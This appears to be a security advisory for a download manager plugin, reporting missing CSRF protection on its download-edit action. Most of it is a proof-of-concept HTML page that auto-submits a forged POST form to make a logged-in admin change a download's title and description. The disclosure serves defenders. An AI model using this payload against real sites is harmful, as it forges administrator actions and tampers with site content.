Description The plugin does not have CSRF checks in some places, which could allow attackers to make logged in admins edit downloads via a CSRF attack
Make an admin open an HTML file containing the following:
```
<body onload="document.forms[0].submit()">
<form action="https://example.com/cmdownload/edit/id/__ADD_ID_HERE__/" method="POST">
<input type="text" name="_edit_id" value="__ADD_ID_HERE__">
<input type="text" name="CMDM_AddDownloadForm_title" value="CSRF: Title">
<input type="text" name="CMDM_AddDownloadForm_package" value="">
<input type="text" name="CMDM_AddDownloadForm_categories[]" value="">
<input type="text" name="CMDM_AddDownloadForm_description" value="CSRF: Description">
<input type="text" name="CMDM_AddDownloadForm_screenshots_v2" value="">
<input type="text" name="CMDM_AddDownloadForm_support_notifications" value="">
<input type="submit" id="CMDM_AddDownloadForm_submit" name="CMDM_AddDownloadForm_submit" value="Update" class="button">
</form>
</body>
```